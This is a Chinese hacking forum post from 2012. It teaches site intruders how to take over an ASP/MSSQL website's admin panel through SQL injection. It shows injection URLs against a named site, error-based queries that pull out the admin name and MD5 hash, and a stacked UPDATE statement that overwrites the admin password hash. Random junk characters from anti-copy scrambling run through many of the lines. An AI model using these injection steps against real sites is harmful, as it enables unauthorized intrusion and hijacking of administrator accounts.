经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。+ l V) N4 _% q( Y, l
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)' {5 g- ]$ V5 y4 {1 @
测试如下:
4 X" @; |2 S' w( v: Khttp://www.tmdsb.com/news.asp?id=121
0 v1 a+ y7 W) b" u4 c% G; E8 u在地址后输入单引号,显示' e7 g) }3 T* ?2 G" e4 H8 v
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
1 L6 c1 X* n8 c( k# e1 _字符串 ’’’ 之前有未闭合的引号: A% n% @: V6 b$ z6 }; C
/news/tmdws.asp,行63$ e/ B7 f2 Y4 x# n& U
说明没有过滤单引号且数据库是MSSQL.
; c1 j% _! W* ^- Gand 1=1正常。and 1=2出错。肯定存在注入9 t, S3 n2 u- I) V. ]: B W
接着输入; h$ I0 [' z9 t& T. c
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
: v/ S+ ?8 }1 l) G得到帐号为:admin
) `. c% A" V! [http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)! q" r$ p0 p G% D$ x: X
得到密码为:a4716077c2ba075c
$ p5 b" o% x0 A2 v p9 `2 f接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433* o6 S; H6 e3 } w1 C
命令如下 :
& K G1 n4 r# | D' p- i;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–- C8 [6 i$ J. S' D
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41